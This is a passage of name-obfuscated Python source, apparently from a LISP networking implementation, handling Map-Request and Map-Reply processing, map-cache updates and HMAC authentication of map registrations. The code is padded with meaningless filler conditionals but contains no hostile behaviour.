if 71 - 71: OOooOOo / i1IIi
if 50 - 50: iIii1I11I1II1 * IiII
mr . last_request_sent_to = ooO00O0oOO . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
ooO00O0oOO . map_requests_sent += 1
return
if 73 - 73: II111iiii
if 4 - 4: II111iiii * o0oOOo0O0Ooo + I11i . II111iiii
if 35 - 35: ooOoO0o - ooOoO0o . i1IIi % oO0o * IiII * I1ii11iIi11i
if 36 - 36: OoOoOO00 % ooOoO0o - Oo0Ooo - OoooooooOO % I1ii11iIi11i / OoOoOO00
if 23 - 23: ooOoO0o . O0 % O0 - iIii1I11I1II1 / IiII
if 8 - 8: i11iIiiIii . Oo0Ooo / i11iIiiIii % IiII
if 41 - 41: iII111i * I11i % OoooooooOO * iIii1I11I1II1
if 73 - 73: I1Ii111 * I1ii11iIi11i
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 79 - 79: I11i / O0 % Ii1I % I1ii11iIi11i
I11I = map_request . target_eid
o0o0o = map_request . target_group
o0OO0OooooO = map_request . print_eid_tuple ( )
iIiIII = mr_source . print_address ( )
OOO0O0O = map_request . nonce
if 21 - 21: OoOoOO00 . ooOoO0o * OoO0O00 - OoOoOO00 - OoooooooOO
I1iiIi111I = green ( iIiIII , False )
iiIi = green ( o0OO0OooooO , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# OoO0O00 * I1Ii111
red ( ecm_source . print_address ( ) , False ) , I1iiIi111I , iiIi ,
lisp_hex_string ( OOO0O0O ) ) )
if 56 - 56: oO0o
if 52 - 52: i1IIi % iIii1I11I1II1 . I1Ii111 / iII111i
if 31 - 31: Ii1I - o0oOOo0O0Ooo % oO0o / OoO0O00 * I11i
if 24 - 24: i1IIi
iii1i = lisp_ddt_map_request ( lisp_sockets , packet , I11I , o0o0o , OOO0O0O )
iii1i . packet = packet
iii1i . itr = ecm_source
iii1i . mr_source = mr_source
iii1i . sport = sport
iii1i . from_pitr = map_request . pitr_bit
iii1i . queue_map_request ( )
if 4 - 4: i11iIiiIii * i1IIi / OOooOOo + iIii1I11I1II1 - II111iiii / I11i
lisp_send_ddt_map_request ( iii1i , False )
return
if 67 - 67: I1ii11iIi11i . OOooOOo / ooOoO0o / I1Ii111 . I11i
if 54 - 54: I1ii11iIi11i - I1IiiI . OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI / iII111i
if 95 - 95: Ii1I . Oo0Ooo
if 42 - 42: IiII . i1IIi % O0 * ooOoO0o - OOooOOo % ooOoO0o
if 99 - 99: i1IIi + OoOoOO00 - iII111i % II111iiii
if 6 - 6: ooOoO0o - I1Ii111 . OoOoOO00
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl , timestamp ) :
if 64 - 64: iII111i + I1ii11iIi11i
OOooo = packet
O0Ooo = lisp_map_request ( )
packet = O0Ooo . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 10 - 10: ooOoO0o / II111iiii
if 30 - 30: i1IIi * Ii1I + Ii1I / I1Ii111
O0Ooo . print_map_request ( )
if 84 - 84: I1IiiI - Oo0Ooo * OoO0O00 * oO0o
if 13 - 13: I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + oO0o - iII111i
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if ( O0Ooo . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , O0Ooo , mr_source ,
mr_port , ttl , timestamp )
return
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if 98 - 98: OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / OoOoOO00 + I1IiiI
if 74 - 74: ooOoO0o . IiII . O0 * I1IiiI * oO0o
if 6 - 6: O0 . Ii1I / Oo0Ooo * o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii
if ( O0Ooo . smr_bit ) :
lisp_process_smr ( O0Ooo )
if 30 - 30: I11i
if 26 - 26: Oo0Ooo - II111iiii % ooOoO0o
if 81 - 81: i11iIiiIii + I1ii11iIi11i * oO0o
if 86 - 86: OoO0O00 . ooOoO0o . o0oOOo0O0Ooo
if 70 - 70: O0 % OoooooooOO - Ii1I * Oo0Ooo
if ( O0Ooo . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( O0Ooo )
if 18 - 18: OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , O0Ooo , mr_source ,
mr_port , ttl , timestamp )
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if 75 - 75: I11i - II111iiii
if 84 - 84: I1ii11iIi11i * IiII / I1IiiI - Ii1I + IiII - i1IIi
if ( lisp_i_am_ms ) :
packet = OOooo
I11I , o0o0o , Oo00Oo00O = lisp_ms_process_map_request ( lisp_sockets ,
OOooo , O0Ooo , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , O0Ooo , ecm_source ,
ecm_port , Oo00Oo00O , I11I , o0o0o )
if 67 - 67: iII111i + OoOoOO00 * o0oOOo0O0Ooo / II111iiii / iIii1I11I1II1
return
if 12 - 12: o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo
if 45 - 45: OoO0O00 % OoO0O00 % O0
if 62 - 62: IiII - iII111i . I1ii11iIi11i . oO0o
if 22 - 22: OoOoOO00 * i11iIiiIii * Ii1I
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , OOooo , O0Ooo ,
ecm_source , mr_port , mr_source )
if 43 - 43: iIii1I11I1II1 / iII111i - Ii1I + I11i % iII111i - OoO0O00
if 5 - 5: OoO0O00 / ooOoO0o
if 92 - 92: Oo0Ooo / iII111i + O0 * ooOoO0o * OOooOOo % Oo0Ooo
if 97 - 97: oO0o / Ii1I
if 70 - 70: iII111i / Oo0Ooo . OoOoOO00 - II111iiii * II111iiii % I1IiiI
if ( lisp_i_am_ddt or ddt_request ) :
packet = OOooo
lisp_ddt_process_map_request ( lisp_sockets , O0Ooo , ecm_source ,
ecm_port )
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
return
if 91 - 91: IiII * Ii1I * OOooOOo
if 17 - 17: o0oOOo0O0Ooo + Ii1I % I1ii11iIi11i + IiII % I1Ii111 + I1ii11iIi11i
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
if 95 - 95: IiII + iII111i % I1IiiI
if 18 - 18: Oo0Ooo
def lisp_store_mr_stats ( source , nonce ) :
iii1i = lisp_get_map_resolver ( source , None )
if ( iii1i == None ) : return
if 8 - 8: O0 + iIii1I11I1II1 - O0
if 67 - 67: O0
if 22 - 22: I11i / i1IIi . II111iiii % ooOoO0o / I11i - Ii1I
if 28 - 28: O0 - Oo0Ooo
iii1i . neg_map_replies_received += 1
iii1i . last_reply = lisp_get_timestamp ( )
if 58 - 58: iIii1I11I1II1 - OoooooooOO - iII111i
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo
if 56 - 56: II111iiii * I1ii11iIi11i * O0 . iII111i . I1ii11iIi11i % I1Ii111
if 99 - 99: Oo0Ooo - OoO0O00 + OoooooooOO - I1Ii111 - I1ii11iIi11i % i1IIi
if ( ( iii1i . neg_map_replies_received % 100 ) == 0 ) : iii1i . total_rtt = 0
if 49 - 49: IiII % OoooooooOO / Oo0Ooo - OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if ( iii1i . last_nonce == nonce ) :
iii1i . total_rtt += ( time . time ( ) - iii1i . last_used )
iii1i . last_nonce = 0
if 62 - 62: IiII
if ( ( iii1i . neg_map_replies_received % 10 ) == 0 ) : iii1i . last_nonce = 0
return
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl , itr_in_ts ) :
global lisp_map_cache
if 53 - 53: oO0o
i1II1i11 = lisp_map_reply ( )
packet = i1II1i11 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
i1II1i11 . print_map_reply ( )
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
if 5 - 5: OOooOOo . I1ii11iIi11i + ooOoO0o . ooOoO0o + iII111i
if 100 - 100: I1Ii111
O0oo0OOo00o0o = None
for OoOOoO0oOo in range ( i1II1i11 . record_count ) :
IiOo0oOoooO = lisp_eid_record ( )
packet = IiOo0oOoooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 18 - 18: iII111i
IiOo0oOoooO . print_record ( " " , False )
if 98 - 98: IiII . OOooOOo * ooOoO0o / OoO0O00
if 21 - 21: OOooOOo / OoO0O00 + OoooooooOO
if 66 - 66: II111iiii * I11i + iII111i * iII111i . i11iIiiIii % Ii1I
if 96 - 96: I1IiiI . O0 / iIii1I11I1II1
if 95 - 95: ooOoO0o * OoO0O00 % OoooooooOO % OoO0O00
if ( IiOo0oOoooO . rloc_count == 0 ) :
lisp_store_mr_stats ( source , i1II1i11 . nonce )
if 79 - 79: II111iiii % Ii1I * oO0o * iII111i + II111iiii
if 51 - 51: I1IiiI + iII111i + I1IiiI / Ii1I * IiII + OOooOOo
oOoiii = ( IiOo0oOoooO . group . is_null ( ) == False )
if 70 - 70: I11i . IiII + IiII
if 74 - 74: Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if ( lisp_decent_push_configured ) :
oOoO0OooO0O = IiOo0oOoooO . action
if ( oOoiii and oOoO0OooO0O == LISP_DROP_ACTION ) :
if ( IiOo0oOoooO . eid . is_local ( ) ) : continue
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
if 28 - 28: I1Ii111 * II111iiii
if 14 - 14: iIii1I11I1II1 / Ii1I + o0oOOo0O0Ooo . iII111i % iII111i . i1IIi
if 67 - 67: IiII * II111iiii + ooOoO0o - i11iIiiIii
if 15 - 15: I11i
if 67 - 67: iIii1I11I1II1
if 91 - 91: ooOoO0o
if ( oOoiii == False and IiOo0oOoooO . eid . is_null ( ) ) : continue
if 66 - 66: OOooOOo
if 5 - 5: i1IIi * OoOoOO00 + i1IIi % I11i
if 79 - 79: OOooOOo % iIii1I11I1II1 / OoOoOO00
if 9 - 9: Ii1I
if 44 - 44: iII111i
if ( oOoiii ) :
I11 = lisp_map_cache_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . group )
else :
I11 = lisp_map_cache . lookup_cache ( IiOo0oOoooO . eid , True )
if 1 - 1: II111iiii + ooOoO0o - Oo0Ooo
II1II1I = ( I11 == None )
if 16 - 16: i1IIi - iIii1I11I1II1 - ooOoO0o / OoooooooOO - Oo0Ooo
if 46 - 46: OoOoOO00 + i1IIi
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
if 17 - 17: O0 % O0 / I1ii11iIi11i . Oo0Ooo . iII111i
if ( I11 == None ) :
iI11Ii , ooooO00o0 , o00oOo0O0OO = lisp_allow_gleaning ( IiOo0oOoooO . eid , IiOo0oOoooO . group ,
None )
if ( iI11Ii ) : continue
else :
if ( I11 . gleaned ) : continue
if 7 - 7: oO0o * oO0o * Oo0Ooo / Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
if 38 - 38: iII111i * OoooooooOO - IiII
if 36 - 36: I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
if 91 - 91: O0 + I1Ii111 * II111iiii - O0 . i11iIiiIii . Oo0Ooo
IiIiIiiII1I = [ ]
O0o00O00oo0oO = None
for I1I1II1iI in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
oOiI111IIIiIii . keys = i1II1i11 . keys
packet = oOiI111IIIiIii . decode ( packet , i1II1i11 . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 80 - 80: oO0o + O0
oOiI111IIIiIii . print_record ( " " )
if 84 - 84: i1IIi - II111iiii
ii1II1i1 = None
if ( I11 ) : ii1II1i1 = I11 . get_rloc ( oOiI111IIIiIii . rloc )
if ( ii1II1i1 ) :
OooOOoOO0OO = ii1II1i1
else :
OooOOoOO0OO = lisp_rloc ( )
if 5 - 5: IiII % oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / Ii1I
if 55 - 55: Oo0Ooo / o0oOOo0O0Ooo
if 51 - 51: I1IiiI + i11iIiiIii / ooOoO0o % I1IiiI + Oo0Ooo
if 6 - 6: OoOoOO00 . O0
if 44 - 44: ooOoO0o % I11i + ooOoO0o . oO0o
if 70 - 70: O0 - I11i . iIii1I11I1II1 % I11i . OoOoOO00 % oO0o
if 5 - 5: O0 * OoO0O00
O00oo0o0o0oo = OooOOoOO0OO . store_rloc_from_record ( oOiI111IIIiIii , i1II1i11 . nonce ,
source )
OooOOoOO0OO . echo_nonce_capable = i1II1i11 . echo_nonce_capable
if 61 - 61: Ii1I / I11i + Ii1I . IiII - OoO0O00 - o0oOOo0O0Ooo
if ( OooOOoOO0OO . echo_nonce_capable ) :
Oo0o = OooOOoOO0OO . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , Oo0o ) == None ) :
lisp_echo_nonce ( Oo0o )
if 84 - 84: OoooooooOO - Oo0Ooo
if 86 - 86: O0 + OoO0O00 + O0 . I1IiiI
if 82 - 82: OoOoOO00
if 61 - 61: oO0o . o0oOOo0O0Ooo
if 82 - 82: Oo0Ooo * OoooooooOO / ooOoO0o / I1IiiI
if 70 - 70: I1IiiI
if ( OooOOoOO0OO . json ) :
if ( lisp_is_json_telemetry ( OooOOoOO0OO . json . json_string ) ) :
o0II1111III = OooOOoOO0OO . json . json_string
o0II1111III = lisp_encode_telemetry ( o0II1111III , ii = itr_in_ts )
OooOOoOO0OO . json . json_string = o0II1111III
if 74 - 74: ooOoO0o * II111iiii
if 96 - 96: i11iIiiIii . I1IiiI - II111iiii . I11i
if 79 - 79: OoO0O00 . OoOoOO00 - i1IIi + Ii1I * i11iIiiIii . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo / oO0o
if 24 - 24: Ii1I + oO0o / OoooooooOO % i11iIiiIii
if 1 - 1: iII111i / I1Ii111 * I1IiiI + OoOoOO00 . OoooooooOO
if 5 - 5: I1IiiI
if 74 - 74: i1IIi * Oo0Ooo - OoOoOO00 * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1 * IiII / i11iIiiIii - ooOoO0o - o0oOOo0O0Ooo
if 30 - 30: OoOoOO00 - OOooOOo . Oo0Ooo
if ( i1II1i11 . rloc_probe and oOiI111IIIiIii . probe_bit ) :
if ( OooOOoOO0OO . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( OooOOoOO0OO , source , O00oo0o0o0oo ,
i1II1i11 , ttl , O0o00O00oo0oO )
if 11 - 11: IiII - I1Ii111 - OoO0O00 * o0oOOo0O0Ooo
if ( OooOOoOO0OO . rloc . is_multicast_address ( ) ) : O0o00O00oo0oO = OooOOoOO0OO
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
IiIiIiiII1I . append ( OooOOoOO0OO )
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if ( lisp_data_plane_security and OooOOoOO0OO . rloc_recent_rekey ( ) ) :
O0oo0OOo00o0o = OooOOoOO0OO
if 10 - 10: ooOoO0o
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
if 96 - 96: oO0o
if 44 - 44: OoooooooOO / iII111i * Oo0Ooo % OoOoOO00 . oO0o
if 97 - 97: iIii1I11I1II1 / ooOoO0o
if 16 - 16: Oo0Ooo % IiII
if 48 - 48: I1IiiI . I1Ii111 . o0oOOo0O0Ooo
if 72 - 72: Ii1I * OoO0O00 / OoO0O00
if ( i1II1i11 . rloc_probe == False and lisp_nat_traversal ) :
ooO0Oo = [ ]
iII1Ii1Ii = [ ]
for OooOOoOO0OO in IiIiIiiII1I :
if 27 - 27: OoOoOO00 + I1ii11iIi11i - OoOoOO00 . iIii1I11I1II1
if 72 - 72: OoO0O00 / I1IiiI . Ii1I
if 11 - 11: I1Ii111 + OoO0O00 / i1IIi - i1IIi
if 14 - 14: Ii1I - o0oOOo0O0Ooo
if 14 - 14: OoO0O00 * OoO0O00 - I1ii11iIi11i
if ( OooOOoOO0OO . rloc . is_private_address ( ) ) :
OooOOoOO0OO . priority = 1
OooOOoOO0OO . state = LISP_RLOC_UNREACH_STATE
ooO0Oo . append ( OooOOoOO0OO )
iII1Ii1Ii . append ( OooOOoOO0OO . rloc . print_address_no_iid ( ) )
continue
if 90 - 90: Oo0Ooo . II111iiii + I1ii11iIi11i - OoOoOO00 / I11i * iII111i
if 58 - 58: oO0o + Oo0Ooo . O0
if 8 - 8: II111iiii + iII111i + OoO0O00 - Ii1I / I1ii11iIi11i
if 86 - 86: I1ii11iIi11i
if 43 - 43: IiII - I1Ii111 / I1Ii111
if 25 - 25: OoOoOO00
if ( OooOOoOO0OO . priority == 254 and lisp_i_am_rtr == False ) :
ooO0Oo . append ( OooOOoOO0OO )
iII1Ii1Ii . append ( OooOOoOO0OO . rloc . print_address_no_iid ( ) )
if 52 - 52: OOooOOo + IiII
if ( OooOOoOO0OO . priority != 254 and lisp_i_am_rtr ) :
ooO0Oo . append ( OooOOoOO0OO )
iII1Ii1Ii . append ( OooOOoOO0OO . rloc . print_address_no_iid ( ) )
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if ( iII1Ii1Ii != [ ] ) :
IiIiIiiII1I = ooO0Oo
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( iII1Ii1Ii ) )
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
if 26 - 26: I1IiiI - OOooOOo
if 34 - 34: I1Ii111 % I1IiiI . OoOoOO00 / iII111i + ooOoO0o . i11iIiiIii
if 51 - 51: OoooooooOO * I1Ii111 * I11i - I1ii11iIi11i + I1Ii111
if 50 - 50: OoooooooOO * II111iiii
if 7 - 7: ooOoO0o / I11i * iII111i
ooO0Oo = [ ]
for OooOOoOO0OO in IiIiIiiII1I :
if ( OooOOoOO0OO . json != None ) : continue
ooO0Oo . append ( OooOOoOO0OO )
if 17 - 17: O0 % I1Ii111
if ( ooO0Oo != [ ] ) :
IiI = len ( IiIiIiiII1I ) - len ( ooO0Oo )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( IiI ) )
if 28 - 28: i1IIi * ooOoO0o
IiIiIiiII1I = ooO0Oo
if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
if 53 - 53: ooOoO0o / IiII
if ( i1II1i11 . rloc_probe and I11 != None ) : IiIiIiiII1I = I11 . rloc_set
if 36 - 36: iIii1I11I1II1
if 78 - 78: II111iiii * I11i
if 47 - 47: Ii1I
if 42 - 42: I11i . oO0o - I1IiiI / OoO0O00
if 75 - 75: I1IiiI / OoOoOO00 . I11i * iIii1I11I1II1
ooOooo00OoO0 = II1II1I
if ( I11 and IiIiIiiII1I != I11 . rloc_set ) :
I11 . delete_rlocs_from_rloc_probe_list ( )
ooOooo00OoO0 = True
if 6 - 6: IiII
if 45 - 45: I11i * I1Ii111 - i1IIi + OoO0O00
if 18 - 18: Ii1I - ooOoO0o
if 14 - 14: ooOoO0o . o0oOOo0O0Ooo + II111iiii
if 50 - 50: Ii1I - i1IIi * oO0o
o0OOO = I11 . uptime if ( I11 ) else None
if ( I11 == None ) :
I11 = lisp_mapping ( IiOo0oOoooO . eid , IiOo0oOoooO . group , IiIiIiiII1I )
I11 . mapping_source = source
if 84 - 84: iIii1I11I1II1 - o0oOOo0O0Ooo
if 37 - 37: iII111i * o0oOOo0O0Ooo
if 23 - 23: ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if ( lisp_i_am_rtr and IiOo0oOoooO . group . is_null ( ) == False ) :
I11 . map_cache_ttl = LISP_MCAST_TTL
else :
I11 . map_cache_ttl = IiOo0oOoooO . store_ttl ( )
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
I11 . action = IiOo0oOoooO . action
I11 . add_cache ( ooOooo00OoO0 )
if 86 - 86: iIii1I11I1II1 - iII111i % Ii1I
if 18 - 18: oO0o / IiII - OOooOOo % Ii1I
ooiI11iIi1 = "Add"
if ( o0OOO ) :
I11 . uptime = o0OOO
I11 . refresh_time = lisp_get_timestamp ( )
ooiI11iIi1 = "Replace"
if 89 - 89: I1ii11iIi11i + I1ii11iIi11i / I1Ii111 - I11i % OoOoOO00 * OOooOOo
if 80 - 80: I1Ii111 / OoOoOO00 % O0 / OoooooooOO * II111iiii
lprint ( "{} {} map-cache with {} RLOCs" . format ( ooiI11iIi1 ,
green ( I11 . print_eid_tuple ( ) , False ) , len ( IiIiIiiII1I ) ) )
if 80 - 80: OOooOOo . OoO0O00 + O0 / IiII
if 30 - 30: Ii1I / I11i . II111iiii + ooOoO0o
if 58 - 58: Oo0Ooo % OOooOOo - i11iIiiIii - I1Ii111 - Ii1I % OoO0O00
if 67 - 67: I1Ii111 + OoO0O00 - oO0o / OOooOOo . OoooooooOO * O0
if 91 - 91: O0 * OoOoOO00 - OoOoOO00 * II111iiii - iII111i
if ( lisp_ipc_dp_socket and O0oo0OOo00o0o != None ) :
lisp_write_ipc_keys ( O0oo0OOo00o0o )
if 38 - 38: oO0o * I11i % OOooOOo
if 80 - 80: O0 % II111iiii / O0 . Oo0Ooo * OoOoOO00 + OOooOOo
if 47 - 47: Ii1I - Oo0Ooo * OoOoOO00
if 20 - 20: oO0o
if 48 - 48: I1IiiI % OoO0O00
if 33 - 33: Ii1I
if 73 - 73: Ii1I . IiII
if ( II1II1I ) :
I1IO0O00o0oo0oO = bold ( "RLOC-probe" , False )
for OooOOoOO0OO in I11 . best_rloc_set :
Oo0o = red ( OooOOoOO0OO . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( I1IO0O00o0oo0oO , Oo0o ) )
lisp_send_map_request ( lisp_sockets , 0 , I11 . eid , I11 . group , OooOOoOO0OO )
if 1 - 1: oO0o - iIii1I11I1II1 % i1IIi
if 94 - 94: Oo0Ooo + iIii1I11I1II1 . OoO0O00 * oO0o . i1IIi
if 85 - 85: O0 / OoOoOO00 . iII111i
return
if 64 - 64: OoO0O00 + I1ii11iIi11i / OoO0O00 * I1Ii111 . Oo0Ooo
if 5 - 5: iII111i - iIii1I11I1II1 * IiII
if 52 - 52: OOooOOo
if 50 - 50: OoOoOO00 % o0oOOo0O0Ooo - II111iiii - i1IIi
if 35 - 35: Oo0Ooo - ooOoO0o % OoO0O00
if 26 - 26: i1IIi * I1Ii111 * OoO0O00 - IiII
if 26 - 26: Oo0Ooo - ooOoO0o . iII111i * OoOoOO00 / OoooooooOO
if 66 - 66: I1IiiI
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 45 - 45: II111iiii * I1Ii111 - II111iiii / I1IiiI % oO0o
packet = map_register . zero_auth ( packet )
iiIIII11iIii = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 83 - 83: oO0o % OoO0O00 + I1ii11iIi11i / OoooooooOO % iII111i
if 22 - 22: I1Ii111
if 41 - 41: O0 * i1IIi
if 89 - 89: iIii1I11I1II1 . I11i % I1ii11iIi11i + II111iiii . OoO0O00
map_register . auth_data = iiIIII11iIii
packet = map_register . encode_auth ( packet )
return ( packet )
if 5 - 5: I1ii11iIi11i / I1IiiI . iII111i
if 7 - 7: Ii1I
if 62 - 62: I1ii11iIi11i + IiII . O0 - OoooooooOO * o0oOOo0O0Ooo % O0
if 63 - 63: OOooOOo + iII111i - IiII - I1IiiI % IiII . OoO0O00
if 73 - 73: OoOoOO00
if 47 - 47: oO0o
if 17 - 17: IiII
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 47 - 47: I11i . I1IiiI % ooOoO0o . i11iIiiIii
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
oO00o0oooo = hashlib . sha1
if 79 - 79: I1IiiI . OoO0O00 - OOooOOo % oO0o - II111iiii + ooOoO0o
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
oO00o0oooo = hashlib . sha256
if 62 - 62: IiII * OoooooooOO * I1ii11iIi11i + i11iIiiIii
if 2 - 2: i1IIi % oO0o / iIii1I11I1II1 . OoOoOO00 * O0 % I1IiiI
if ( do_hex ) :
iiIIII11iIii = hmac . new ( password . encode ( ) , packet , oO00o0oooo ) . hexdigest ( )
else :
iiIIII11iIii = hmac . new ( password . encode ( ) , packet , oO00o0oooo ) . digest ( )
if 31 - 31: OoooooooOO + I11i - II111iiii % II111iiii % Ii1I
return ( iiIIII11iIii )
if 10 - 10: iIii1I11I1II1 . I1IiiI - II111iiii + O0
if 97 - 97: oO0o . Oo0Ooo % ooOoO0o + I1Ii111 . i11iIiiIii + Ii1I
if 61 - 61: IiII + iII111i
if 15 - 15: II111iiii / iIii1I11I1II1 / I1ii11iIi11i % OoOoOO00 % OoO0O00 - I1Ii111
if 17 - 17: OoooooooOO
if 23 - 23: OoO0O00
if 26 - 26: I11i % IiII . OoooooooOO % i11iIiiIii * IiII
if 55 - 55: I11i / I11i - IiII - I11i
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 3 - 3: oO0o % o0oOOo0O0Ooo + OoOoOO00
iiIIII11iIii = lisp_hash_me ( packet , alg_id , password , True )
iII11I11I = ( iiIIII11iIii == auth_data )
if 3 - 3: OoooooooOO
if 14 - 14: ooOoO0o % I1IiiI / I1Ii111 . I1Ii111 / I1IiiI + Oo0Ooo
if 70 - 70: i1IIi % i1IIi + I1ii11iIi11i + o0oOOo0O0Ooo
if 1 - 1: iII111i
if ( iII11I11I == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( iiIIII11iIii , auth_data ) )
if 98 - 98: o0oOOo0O0Ooo - I1ii11iIi11i
if 74 - 74: OoooooooOO
return ( iII11I11I )
if 16 - 16: OOooOOo / iII111i - OOooOOo / OoooooooOO + oO0o
if 80 - 80: I1IiiI % I1IiiI . Oo0Ooo
if 94 - 94: o0oOOo0O0Ooo
if 88 - 88: OoO0O00 / II111iiii
if 27 - 27: OOooOOo - i1IIi + O0 . I1Ii111 % I11i . I1ii11iIi11i
